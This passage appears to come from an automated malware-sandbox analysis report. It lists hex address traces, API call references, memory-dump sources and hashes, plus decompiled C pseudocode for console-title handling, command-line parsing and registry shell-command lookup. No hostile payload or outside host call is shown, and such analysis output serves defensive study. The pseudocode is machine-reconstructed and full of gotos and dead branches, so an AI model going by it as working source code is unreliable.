                                                    0x011f4ffe
                                                    0x011f4ffe
                                                    0x00000000
                                                    0x011f4ffe
                                                    0x011f4fbc
                                                    0x011f4fbe
                                                    0x011f4fbe
                                                    0x011f4fc1
                                                    0x011f4fc1
                                                    0x011f4fc4
                                                    0x011f4fc7
                                                    0x011f4fc7
                                                    0x011f4fcc
                                                    0x011f4fcc
                                                    0x011f4fce
                                                    0x011f4fd0
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4fd2
                                                    0x011f4fd3
                                                    0x011f4fd9
                                                    0x00000000
                                                    0x011f4fd9
                                                    0x011f4f9f
                                                    0x00000000
                                                    0x011f4fa4
                                                    0x011f4f30
                                                    0x011f4f32
                                                    0x011f4f37
                                                    0x011f4f41
                                                    0x011f4f46
                                                    0x00000000
                                                    0x011f4f46
                                                    0x011f4ed6
                                                    0x011f4ede
                                                    0x00000000
                                                    0x011f4ede
                                                    0x011f4d18
                                                    0x011f4d1a
                                                    0x011f4d2e
                                                    0x011f4d3e
                                                    0x011f4d46
                                                    0x011f4ea8
                                                    0x011f4ea8
                                                    0x011f4eb0
                                                    0x011f4eb2
                                                    0x00000000
                                                    0x011f4eb2
                                                    0x011f4d50
                                                    0x011f4d58
                                                    0x011f4e68
                                                    0x011f4e6f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4e6f
                                                    0x011f4d5e
                                                    0x011f4d64
                                                    0x011f4d64
                                                    0x011f4d67
                                                    0x011f4d67
                                                    0x011f4d6a
                                                    0x011f4d6d
                                                    0x011f4d74
                                                    0x011f4d76
                                                    0x011f4d7e
                                                    0x011f4e62
                                                    0x011f4e62
                                                    0x00000000
                                                    0x011f4e62
                                                    0x011f4d84
                                                    0x011f4d89
                                                    0x011f4d90
                                                    0x011f4d96
                                                    0x011f4d99
                                                    0x011f4d9c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4d9c
                                                    0x011f4da9
                                                    0x011f4dab
                                                    0x011f4daf
                                                    0x011f4e05
                                                    0x011f4e05
                                                    0x011f4e0b
                                                    0x011f4e0d
                                                    0x011f4e12
                                                    0x011f4e14
                                                    0x011f4e1c
                                                    0x011f4eb9
                                                    0x00000000
                                                    0x011f4eb9
                                                    0x011f4e24
                                                    0x011f4e2e
                                                    0x011f4e5b
                                                    0x011f4e5d
                                                    0x00000000
                                                    0x011f4e5d
                                                    0x011f4e30
                                                    0x011f4e32
                                                    0x011f4e32
                                                    0x011f4e35
                                                    0x011f4e35
                                                    0x011f4e38
                                                    0x011f4e3b
                                                    0x011f4e44
                                                    0x011f4e46
                                                    0x011f4e4d
                                                    0x011f4e53
                                                    0x011f4e58
                                                    0x011f4e58
                                                    0x00000000
                                                    0x011f4e44
                                                    0x011f4dbc
                                                    0x011f4dbf
                                                    0x011f4dc1
                                                    0x011f4df5
                                                    0x011f4df5
                                                    0x011f4e00
                                                    0x011f4e02
                                                    0x00000000
                                                    0x011f4e02
                                                    0x011f4dc8
                                                    0x011f4dcd
                                                    0x011f4dd0
                                                    0x011f4dd4
                                                    0x011f4ddb
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4ddd
                                                    0x011f4de0
                                                    0x011f4de1
                                                    0x011f4de4
                                                    0x011f4de7
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4def
                                                    0x011f4def
                                                    0x00000000
                                                    0x011f4def
                                                    0x011f4deb
                                                    0x011f4ded
                                                    0x011f4dfa
                                                    0x00000000
                                                    0x011f4dfa
                                                    0x00000000
                                                    0x011f4e71
                                                    0x011f4e7f
                                                    0x011f4e90
                                                    0x011f4e94
                                                    0x011f4e9a
                                                    0x011f4ea0
                                                    0x00000000

                                                    APIs
                                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 011F4D3E
                                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000001,0000002E,00000104,00000000,00000000,00000000,00000000,?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 011F4E9A
                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,\Shell\Open\Command,00000000), ref: 011F4F8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Enum$Open
                                                    • String ID: %s=%s$.$\Shell\Open\Command
                                                    • API String ID: 2886760741-1459555574
                                                    • Opcode ID: a64f60d8e864bbc73c0f5a92aa3eb1a372da650b1ed6a00d734aef6fdf5f5e78
                                                    • Instruction ID: 532dcdae4eadcfb54ca096d0ade0e334b8c303a924ae03ce7293fde916db9f89
                                                    • Opcode Fuzzy Hash: a64f60d8e864bbc73c0f5a92aa3eb1a372da650b1ed6a00d734aef6fdf5f5e78
                                                    • Instruction Fuzzy Hash: A7816975A0022547EB3C9F2CDC98BFB3769EB94304F0542ACEA1A97681EB749E418791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DB2B0, Relevance: 10.7, APIs: 7, Instructions: 172COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E011DB2B0(WCHAR* __ecx, signed int _a4) {
				signed int _v12;
				long _v536;
				wchar_t* _v540;
				wchar_t* _v544;
				wchar_t* _v548;
				signed int _v552;
				WCHAR* _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				long _t35;
				void* _t38;
				short _t47;
				wchar_t* _t48;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t51;
				signed int _t54;
				WCHAR* _t55;
				signed int _t62;
				intOrPtr* _t63;
				WCHAR* _t70;
				intOrPtr _t77;
				wchar_t* _t79;
				WCHAR* _t80;
				wchar_t* _t81;
				signed int _t82;

				_t65 = __ecx;
				_t32 =  *0x11fd0b4; // 0x1805bc26
				_v12 = _t32 ^ _t82;
				_t62 = _a4;
				_t76 =  &_v544;
				_v552 = _t62;
				_v548 = 0;
				_v540 = 0;
				_t35 = E011DB42E( &_v544);
				if(_t35 < 0) {
					SetLastError(RtlNtStatusToDosError(_t35));
					L23:
					if(_t62 == 0) {
						_t62 = 0;
						_t80 = 0;
						L12:
						if(_t80 != 0) {
							SetConsoleTitleW(_t80);
							 *0x11fd59c = _t62;
						}
						L14:
						_t77 = 0;
						if(_v548 == 0) {
							L17:
							_t38 = _v540;
							if(_t38 != 0) {
								LocalFree(_t38);
							}
							if(_t77 != 0) {
								L29:
								_push(0);
								_push(8);
								E011DC5A2(_t65);
								goto L20;
							} else {
								L20:
								return E011E6FD0(_t77, _t62, _v12 ^ _t82, _t76, _t77, _t80);
							}
						}
						L15:
						if(_t80 != 0) {
							_t65 = _t80;
							E011E0040(_t80);
						}
						goto L17;
					}
					_t65 =  *(_t62 + 0x3c);
					_t80 = E011DDEF9( *(_t62 + 0x3c));
					if(_t80 == 0) {
						goto L14;
					}
					_t70 = _t80;
					_t62 = 0;
					_t21 =  &(_t70[1]); // 0x2
					_t76 = _t21;
					do {
						_t47 =  *_t70;
						_t70 =  &(_t70[1]);
					} while (_t47 != 0);
					_t65 = _t70 - _t76 >> 1;
					if(_t70 - _t76 >> 1 < 0x104) {
						goto L12;
					}
					_t77 = 1;
					goto L29;
				}
				_t48 = _v544;
				if(_t48 >= 3) {
					_t48 = _t48 + 0xfffffff0;
				}
				if(_t48 != 0) {
					goto L23;
				} else {
					_t49 = _t48 + 1;
					_t77 = _t49;
					_v548 = _t49;
					_v560 = _t77;
					_t50 = E011DB3FC(_t65);
					_v540 = _t50;
					_t65 = 0x40002748;
					if(_t50 == 0) {
						goto L29;
					} else {
						_t63 = _t50;
						_t76 = 0;
						_t11 = _t63 + 2; // 0x2
						_t65 = _t11;
						do {
							_t51 =  *_t63;
							_t63 = _t63 + 2;
						} while (_t51 != 0);
						_t62 = _t63 - _t65 >> 1;
						if(_t62 >= 0x104) {
							goto L17;
						}
						_t65 = 0x208;
						_t80 = E011E00B0(0x208);
						_v556 = _t80;
						if(_t80 == 0) {
							goto L17;
						}
						_t76 = 0x104;
						_t65 = _t80;
						E011E1040(_t80, 0x104, _v540);
						_t54 = _v552;
						if(_t54 == 0) {
							_t55 =  &_v536;
							_v544 = _t55;
							if(GetConsoleTitleW(_t55, 0x104) == 0) {
								goto L15;
							}
							if(wcsstr( &_v536, _v540) == 0) {
								L36:
								_t76 = 0x104;
								_t65 = _t80;
								if(E011E18C0(_t80, 0x104, _v544) != 0) {
									goto L15;
								}
								L11:
								_t62 = 0;
								goto L12;
							}
							_t79 = _v540;
							_t81 =  &_v536;
							_t62 = _t62 + _t62;
							do {
								_t81 = _t81 + _t62;
							} while (wcsstr(_t81, _t79) != 0);
							_t77 = _v560;
							_v544 = _t81;
							_t80 = _v556;
							goto L36;
						}
						if( *((intOrPtr*)(_t54 + 0x3c)) == 0) {
							_t65 = 0;
							_t77 = 0;
							goto L15;
						}
						_t76 = 0x104;
						_t65 = _t80;
						if(E011E18C0(_t80, 0x104,  *((intOrPtr*)(_t54 + 0x3c))) != 0) {
							goto L15;
						}
						goto L11;
					}
				}
			}
































                                                    0x011db2b0
                                                    0x011db2bb
                                                    0x011db2c2
                                                    0x011db2c6
                                                    0x011db2c9
                                                    0x011db2d2
                                                    0x011db2d9
                                                    0x011db2df
                                                    0x011db2e5
                                                    0x011db2ec
                                                    0x011f1346
                                                    0x011f134c
                                                    0x011f134e
                                                    0x011f142c
                                                    0x011f142e
                                                    0x011db3a0
                                                    0x011db3a2
                                                    0x011db3a5
                                                    0x011db3ab
                                                    0x011db3ab
                                                    0x011db3b1
                                                    0x011db3b3
                                                    0x011db3bb
                                                    0x011db3c8
                                                    0x011db3c8
                                                    0x011db3d0
                                                    0x011db3d3
                                                    0x011db3d3
                                                    0x011db3db
                                                    0x011f138b
                                                    0x011f138d
                                                    0x011f138e
                                                    0x011f1390
                                                    0x00000000
                                                    0x011db3e1
                                                    0x011db3e1
                                                    0x011db3f3
                                                    0x011db3f3
                                                    0x011db3db
                                                    0x011db3bd
                                                    0x011db3bf
                                                    0x011db3c1
                                                    0x011db3c3
                                                    0x011db3c3
                                                    0x00000000
                                                    0x011db3bf
                                                    0x011f1354
                                                    0x011f135c
                                                    0x011f1360
                                                    0x00000000
                                                    0x00000000
                                                    0x011f1366
                                                    0x011f1368
                                                    0x011f136a
                                                    0x011f136a
                                                    0x011f136d
                                                    0x011f136d
                                                    0x011f1370
                                                    0x011f1373
                                                    0x011f137a
                                                    0x011f1382
                                                    0x00000000
                                                    0x00000000
                                                    0x011f138a
                                                    0x00000000
                                                    0x011f138a
                                                    0x011db2f2
                                                    0x011db2fb
                                                    0x011f139c
                                                    0x011f139c
                                                    0x011db303
                                                    0x00000000
                                                    0x011db309
                                                    0x011db309
                                                    0x011db30a
                                                    0x011db30c
                                                    0x011db317
                                                    0x011db31d
                                                    0x011db322
                                                    0x011db328
                                                    0x011db32b
                                                    0x00000000
                                                    0x011db331
                                                    0x011db331
                                                    0x011db333
                                                    0x011db335
                                                    0x011db335
                                                    0x011db338
                                                    0x011db338
                                                    0x011db33b
                                                    0x011db33e
                                                    0x011db345
                                                    0x011db34d
                                                    0x00000000
                                                    0x00000000
                                                    0x011db34f
                                                    0x011db359
                                                    0x011db35b
                                                    0x011db363
                                                    0x00000000
                                                    0x00000000
                                                    0x011db36b
                                                    0x011db370
                                                    0x011db372
                                                    0x011db377
                                                    0x011db37f
                                                    0x011f13a4
                                                    0x011f13b0
                                                    0x011f13be
                                                    0x00000000
                                                    0x00000000
                                                    0x011f13db
                                                    0x011f140d
                                                    0x011f1413
                                                    0x011f1418
                                                    0x011f1421
                                                    0x00000000
                                                    0x00000000
                                                    0x011db39e
                                                    0x011db39e
                                                    0x00000000
                                                    0x011db39e
                                                    0x011f13dd
                                                    0x011f13e3
                                                    0x011f13e9
                                                    0x011f13eb
                                                    0x011f13eb
                                                    0x011f13f7
                                                    0x011f13fb
                                                    0x011f1401
                                                    0x011f1407
                                                    0x00000000
                                                    0x011f1407
                                                    0x011db389
                                                    0x011db3f6
                                                    0x011db3f8
                                                    0x00000000
                                                    0x011db3f8
                                                    0x011db38e
                                                    0x011db393
                                                    0x011db39c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011db39c
                                                    0x011db32b

                                                    APIs
                                                      • Part of subcall function 011DB42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 011DB448
                                                      • Part of subcall function 011DB42E: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 011DB460
                                                      • Part of subcall function 011DB42E: NtClose.NTDLL(00000000), ref: 011DB4B1
                                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 011DB3A5
                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011DB3D3
                                                    • RtlNtStatusToDosError.NTDLL ref: 011F133F
                                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1346
                                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 011F13B6
                                                    • wcsstr.MSVCRT ref: 011F13D1
                                                    • wcsstr.MSVCRT ref: 011F13EF
                                                      • Part of subcall function 011DB3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,011F95EF,011E9564,00000001,?), ref: 011DB421
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                    • String ID:
                                                    • API String ID: 1313749407-0
                                                    • Opcode ID: 83904959c6b92378cdc39627f5e44b6eacf0c5795969984e008f468defc49b64
                                                    • Instruction ID: f37d632e44a7e370380b39cf19f060590834647b2277249efc6ea4713143e61b
                                                    • Opcode Fuzzy Hash: 83904959c6b92378cdc39627f5e44b6eacf0c5795969984e008f468defc49b64
                                                    • Instruction Fuzzy Hash: A5512A31A0821AABDF2C9FB99C987AE77A4EF55314F1500ADDE06D7244DF30CE818B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DE9A0, Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E011DE9A0(long __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				signed int _t63;
				long _t64;
				wchar_t* _t66;
				signed char _t67;
				signed int _t68;
				int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				long _t75;
				void* _t78;
				long _t83;
				void* _t86;
				void* _t92;
				signed int* _t95;
				int _t97;
				long _t99;
				wchar_t* _t101;
				wchar_t* _t104;
				wchar_t* _t106;
				wchar_t* _t109;
				long _t111;
				wchar_t* _t114;
				signed int _t117;
				void* _t118;
				signed short* _t123;
				long _t124;
				long _t125;
				signed int _t138;
				void* _t139;
				long _t142;
				signed int _t146;
				void* _t149;
				signed int _t152;
				long _t153;
				void* _t157;
				signed int _t159;
				signed int* _t160;
				signed int _t163;
				void* _t164;
				void* _t168;
				void* _t171;
				signed short* _t173;
				long _t174;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t183;
				signed int _t184;
				void* _t188;

				_t173 = __ecx;
				_t121 = 0x50;
				_push(_t160);
				_t114 = E011E00B0(0x50);
				if(_t114 == 0) {
					E011F9287(0x50);
					__imp__longjmp(0x120b8b8, 1);
					goto L91;
				} else {
					 *_t114 = __ecx;
					_t114[0x10] = 0;
					_t121 =  *0x120fa8c +  *0x120fa8c;
					_t111 = E011E00B0( *0x120fa8c +  *0x120fa8c);
					if(_t111 == 0) {
						L91:
						E011F9287(_t121);
						__imp__longjmp(0x120b8b8, 1);
						asm("int3");
						E011F9287(_t121);
						__imp__longjmp(0x120b8b8, 1);
						E011F9287(_t121);
						__imp__longjmp(0x120b8b8, 1);
						L94:
						while(1) {
							if(E011DD7D4(_t114,  *_t173) != 0) {
								L17:
								 *(_t184 - 0xdc) = 0;
								if(_t114 == 0) {
									L19:
									 *_t160 =  *_t173;
									_t160 =  &(_t160[0]);
									if( *_t173 == 0x22) {
										while(1) {
											_t62 = _t173[1];
											_t123 = _t173;
											_t173 =  &(_t173[1]);
											 *_t160 = _t62;
											_t160 =  &(_t160[0]);
											_t63 =  *_t173 & 0x0000ffff;
											if(_t63 == 0) {
												break;
											}
											if(_t63 == 0x22) {
												goto L20;
											} else {
												if(_t173[1] != 0) {
													continue;
												} else {
													goto L20;
												}
											}
											goto L22;
										}
										_t173 = _t123;
									}
									L20:
									 *(_t184 - 0xd8) = 0;
								} else {
									_t66 = wcschr(_t114,  *_t173 & 0x0000ffff);
									_t188 = _t188 + 8;
									if(_t66 != 0) {
										_t67 =  *(_t184 + 8);
										if((_t67 & 0x00000002) != 0) {
											_t68 =  *_t173 & 0x0000ffff;
											if( *(_t184 - 0xd8) == 0) {
												_t160 =  &(_t160[0]);
											}
											 *_t160 = _t68;
											 *(_t184 - 0xd8) = 1;
											_t160 =  &(_t160[1]);
										} else {
											if((_t67 & 0x00000004) != 0) {
												 *_t160 =  *_t173;
											}
											 *(_t184 - 0xd8) = 0;
											_t160 =  &(_t160[0]);
										}
									} else {
										goto L19;
									}
								}
								_t64 = _t173[1] & 0x0000ffff;
								_t173 =  &(_t173[1]);
								_t124 = _t64;
								if(_t64 != 0) {
									goto L14;
								}
							} else {
								L29:
								_t75 =  *_t173 & 0x0000ffff;
								if(_t75 != 0) {
									_t142 = _t75;
									while(_t142 != 0x22) {
										_t97 = iswspace(_t142);
										_t188 = _t188 + 4;
										if(_t97 != 0) {
											L39:
											if( *(_t184 - 0xe0) == 0 || _t114 == 0) {
												L42:
												if( *(_t184 - 0xe4) != 0) {
													if(E011DD7D4(_t114,  *_t173) != 0) {
														break;
													} else {
														goto L43;
													}
												} else {
													L43:
													_t99 = _t173[1] & 0x0000ffff;
													_t173 =  &(_t173[1]);
													_t142 = _t99;
													if(_t99 != 0) {
														continue;
													} else {
													}
												}
											} else {
												_t101 = wcschr(_t114,  *_t173 & 0x0000ffff);
												_t188 = _t188 + 8;
												if(_t101 != 0) {
													break;
												} else {
													goto L42;
												}
											}
										} else {
											_t104 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
											if(_t104 != 0) {
												goto L39;
											} else {
												break;
											}
										}
										goto L22;
									}
									if( *_t173 != 0) {
										if( *(_t184 - 0xdc) == 0 &&  *(_t184 - 0xd8) == 0) {
											_t160 =  &(_t160[0]);
										}
										 *(_t184 - 0xd8) = 1;
										goto L17;
										do {
											do {
												do {
													do {
														goto L17;
														L14:
													} while (_t124 == 0x22);
													_t70 = iswspace(_t124);
													_t188 = _t188 + 4;
													if(_t70 != 0) {
														break;
													} else {
														goto L16;
													}
													goto L22;
													L16:
													_t109 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
													_t188 = _t188 + 8;
												} while (_t109 == 0);
												_t71 =  *(_t184 + 8);
												if((_t71 & 0x00000001) != 0) {
													goto L54;
												} else {
													L25:
													_t72 = _t71 & 0x00000002;
													 *(_t184 - 0xe0) = _t72;
													if(_t72 == 0 || _t114 == 0) {
														goto L28;
													} else {
														goto L27;
													}
												}
												goto L22;
												L54:
											} while ( *(_t184 - 0xdc) == 0);
											goto L25;
											L27:
											_t106 = wcschr(_t114,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
										} while (_t106 != 0);
										L28:
										_t74 =  *(_t184 + 8) & 0x00000004;
										 *(_t184 - 0xe4) = _t74;
										if(_t74 != 0) {
											continue;
										} else {
											goto L29;
										}
									}
								}
							}
							L22:
							_t125 =  *(_t184 - 0xe8);
							_t163 = _t160 - _t125 >> 1;
							_t148 = 4 + _t163 * 2;
							if(E011E0100(_t125, 4 + _t163 * 2) == 0) {
								E011F9287(_t125);
								__imp__longjmp(0x120b8b8, 1);
								asm("int3");
								while(1) {
									L100:
									_t149 = _t125 + 2;
									do {
										_t78 =  *_t125;
										_t125 = _t125 + 2;
									} while (_t78 != 0);
									_t164 = _t163 + (_t125 - _t149 >> 1);
									while(1) {
										L64:
										_t128 = _t164 + _t164;
										_t174 = E011E00B0(_t164 + _t164);
										 *(_t184 - 4) = _t174;
										if(_t174 == 0) {
											break;
										}
										_t130 = _t114[0xf];
										if(_t114[0xf] != 0) {
											E011E1040(_t174, _t164, _t130);
										}
										_t86 = 0;
										if(_t164 == 0 || _t164 > 0x7fffffff) {
											_t86 = 0x80070057;
										}
										if(_t86 < 0) {
											L107:
											_t152 = 0;
										} else {
											_t86 = 0;
											_t139 = _t164;
											_t153 = _t174;
											if(_t164 == 0) {
												L106:
												_t86 = 0x80070057;
												goto L107;
											} else {
												while( *_t153 != _t86) {
													_t153 = _t153 + 2;
													_t139 = _t139 - 1;
													if(_t139 != 0) {
														continue;
													} else {
														goto L106;
													}
													goto L73;
												}
												if(_t139 == 0) {
													goto L106;
												} else {
													_t152 = _t164 - _t139;
												}
											}
										}
										L73:
										if(_t86 >= 0) {
											_t95 =  *(_t184 - 4) + _t152 * 2;
											_t179 = _t164 - _t152;
											if(_t179 == 0) {
												L79:
												_t95 = _t95 - 2;
											} else {
												_t157 = _t152 + 0x7ffffffe + _t179 - _t164;
												_t164 = 0x120faa0 - _t95;
												while(_t157 != 0) {
													_t138 =  *(_t164 + _t95) & 0x0000ffff;
													if(_t138 == 0) {
														break;
													} else {
														 *_t95 = _t138;
														_t157 = _t157 - 1;
														_t95 =  &(_t95[0]);
														_t179 = _t179 - 1;
														if(_t179 != 0) {
															continue;
														} else {
															goto L79;
														}
													}
													goto L81;
												}
												if(_t179 == 0) {
													goto L79;
												}
											}
											L81:
											_t174 =  *(_t184 - 4);
											 *_t95 = 0;
										}
										_t114[0xf] = _t174;
										while(E011DEEC8() != 0) {
											if(E011DF030(1) == 0x4000) {
												_t125 = _t114[0xf];
												_t163 =  *0x120fa8c;
												if(_t125 != 0) {
													goto L100;
												}
												goto L64;
											} else {
												_t177 =  *(_t184 - 8);
												if(E011E02B0(_t114, _t177, _t164, _t177) != 0) {
													_t92 =  *_t177;
													do {
														_t51 = _t92 + 0x14; // 0x14
														_t117 = _t51;
														_t92 =  *_t117;
														 *(_t184 - 8) = _t117;
													} while (_t92 != 0);
													_t114 =  *(_t184 - 0x10);
													continue;
												} else {
													E011DF300(_t91, 0, 0, _t91);
													break;
												}
											}
											goto L112;
										}
										_t114[0xd] =  *(_t184 - 0xc);
										return _t114;
										goto L112;
									}
									E011F9287(_t128);
									__imp__longjmp(0x120b8b8, 1);
									asm("int3");
									if( *0x120fa90 != 0) {
										E011F82EB(_t128);
									}
									 *0x11fd5c8 = 0;
									if( *0x120fa88 != 0) {
										E011F8121(_t174, 0);
									}
									_t83 = _t174;
									return _t83;
									goto L112;
								}
							} else {
								_pop(_t168);
								_pop(_t180);
								_pop(_t118);
								return E011E6FD0(_t76, _t118,  *(_t184 - 8) ^ _t184, _t148, _t168, _t180);
							}
							goto L112;
						}
					} else {
						_t159 =  *0x120fa8c;
						_t114[0xe] = _t111;
						if(_t159 != 0) {
							if(_t159 > 0x7fffffff) {
								if(_t159 != 0) {
									goto L10;
								}
							} else {
								_t183 = 0x7ffffffe - _t159;
								_t171 = 0x120faa0 - _t111;
								while(_t183 + _t159 != 0) {
									_t146 =  *(_t171 + _t111) & 0x0000ffff;
									if(_t146 == 0) {
										break;
									} else {
										 *_t111 = _t146;
										_t111 = _t111 + 2;
										_t159 = _t159 - 1;
										if(_t159 != 0) {
											continue;
										} else {
											L8:
											_t111 = _t111 - 2;
										}
									}
									L10:
									 *_t111 = 0;
									goto L11;
								}
								if(_t159 == 0) {
									goto L8;
								}
								goto L10;
							}
						}
						L11:
						return _t114;
					}
				}
				L112:
			}

























































                                                    0x011de9a4
                                                    0x011de9a6
                                                    0x011de9ab
                                                    0x011de9b1
                                                    0x011de9b5
                                                    0x011ec018
                                                    0x011ec024
                                                    0x00000000
                                                    0x011de9bb
                                                    0x011de9c0
                                                    0x011de9c2
                                                    0x011de9c9
                                                    0x011de9cc
                                                    0x011de9d3
                                                    0x011ec02a
                                                    0x011ec02a
                                                    0x011ec036
                                                    0x011ec03c
                                                    0x011ec03d
                                                    0x011ec049
                                                    0x011ec04f
                                                    0x011ec05b
                                                    0x00000000
                                                    0x011ec061
                                                    0x011ec06d
                                                    0x011deb5a
                                                    0x011deb5a
                                                    0x011deb66
                                                    0x011deb7e
                                                    0x011deb81
                                                    0x011deb84
                                                    0x011deb8b
                                                    0x011decf0
                                                    0x011decf0
                                                    0x011decf4
                                                    0x011decf6
                                                    0x011decf9
                                                    0x011decfc
                                                    0x011decff
                                                    0x011ded05
                                                    0x00000000
                                                    0x00000000
                                                    0x011ded0a
                                                    0x00000000
                                                    0x011ded10
                                                    0x011ded15
                                                    0x00000000
                                                    0x011ded17
                                                    0x00000000
                                                    0x011ded17
                                                    0x011ded15
                                                    0x00000000
                                                    0x011ded0a
                                                    0x011ded6e
                                                    0x011ded6e
                                                    0x011deb91
                                                    0x011deb91
                                                    0x011deb68
                                                    0x011deb6d
                                                    0x011deb73
                                                    0x011deb78
                                                    0x011deccd
                                                    0x011decd2
                                                    0x011ded23
                                                    0x011ded26
                                                    0x011ded69
                                                    0x011ded69
                                                    0x011ded28
                                                    0x011ded2e
                                                    0x011ded38
                                                    0x011decd4
                                                    0x011decd6
                                                    0x011ec092
                                                    0x011ec092
                                                    0x011decdc
                                                    0x011dece6
                                                    0x011dece6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011deb78
                                                    0x011deb9b
                                                    0x011deb9f
                                                    0x011deba2
                                                    0x011deba7
                                                    0x00000000
                                                    0x00000000
                                                    0x011ec073
                                                    0x011dec20
                                                    0x011dec20
                                                    0x011dec26
                                                    0x011dec28
                                                    0x011dec30
                                                    0x011dec37
                                                    0x011dec3d
                                                    0x011dec42
                                                    0x011dec8a
                                                    0x011dec91
                                                    0x011deca9
                                                    0x011decb0
                                                    0x011ec084
                                                    0x00000000
                                                    0x011ec08a
                                                    0x00000000
                                                    0x011ec08a
                                                    0x011decb6
                                                    0x011decb6
                                                    0x011decb6
                                                    0x011decba
                                                    0x011decbd
                                                    0x011decc2
                                                    0x00000000
                                                    0x00000000
                                                    0x011decc8
                                                    0x011decc2
                                                    0x011dec97
                                                    0x011dec9c
                                                    0x011deca2
                                                    0x011deca7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011deca7
                                                    0x011dec44
                                                    0x011dec4f
                                                    0x011dec55
                                                    0x011dec5a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dec5a
                                                    0x00000000
                                                    0x011dec42
                                                    0x011dec60
                                                    0x011dec6d
                                                    0x011dec78
                                                    0x011dec78
                                                    0x011dec7b
                                                    0x011dec85
                                                    0x011deb5a
                                                    0x011deb5a
                                                    0x011deb5a
                                                    0x011deb5a
                                                    0x00000000
                                                    0x011deb26
                                                    0x011deb26
                                                    0x011deb2d
                                                    0x011deb33
                                                    0x011deb38
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011deb3e
                                                    0x011deb49
                                                    0x011deb4f
                                                    0x011deb52
                                                    0x011debde
                                                    0x011debe3
                                                    0x00000000
                                                    0x011debe9
                                                    0x011debe9
                                                    0x011debe9
                                                    0x011debec
                                                    0x011debf2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011debf2
                                                    0x00000000
                                                    0x011ded40
                                                    0x011ded40
                                                    0x00000000
                                                    0x011debf8
                                                    0x011debfd
                                                    0x011dec03
                                                    0x011dec06
                                                    0x011dec0e
                                                    0x011dec11
                                                    0x011dec14
                                                    0x011dec1a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dec1a
                                                    0x011dec60
                                                    0x011dec26
                                                    0x011debad
                                                    0x011debad
                                                    0x011debb5
                                                    0x011debb7
                                                    0x011debc5
                                                    0x011ec09a
                                                    0x011ec0a6
                                                    0x011ec0ac
                                                    0x011ec0ad
                                                    0x011ec0ad
                                                    0x011ec0ad
                                                    0x011ec0b0
                                                    0x011ec0b0
                                                    0x011ec0b3
                                                    0x011ec0b6
                                                    0x011ec0bf
                                                    0x011dedfa
                                                    0x011dedfa
                                                    0x011dedfa
                                                    0x011dee02
                                                    0x011dee04
                                                    0x011dee09
                                                    0x00000000
                                                    0x00000000
                                                    0x011dee0f
                                                    0x011dee14
                                                    0x011ec0cb
                                                    0x011ec0cb
                                                    0x011dee1a
                                                    0x011dee1e
                                                    0x011ec0d5
                                                    0x011ec0d5
                                                    0x011dee32
                                                    0x011ec0f0
                                                    0x011ec0f0
                                                    0x011dee38
                                                    0x011dee38
                                                    0x011dee3a
                                                    0x011dee3c
                                                    0x011dee40
                                                    0x011ec0eb
                                                    0x011ec0eb
                                                    0x00000000
                                                    0x011dee46
                                                    0x011dee46
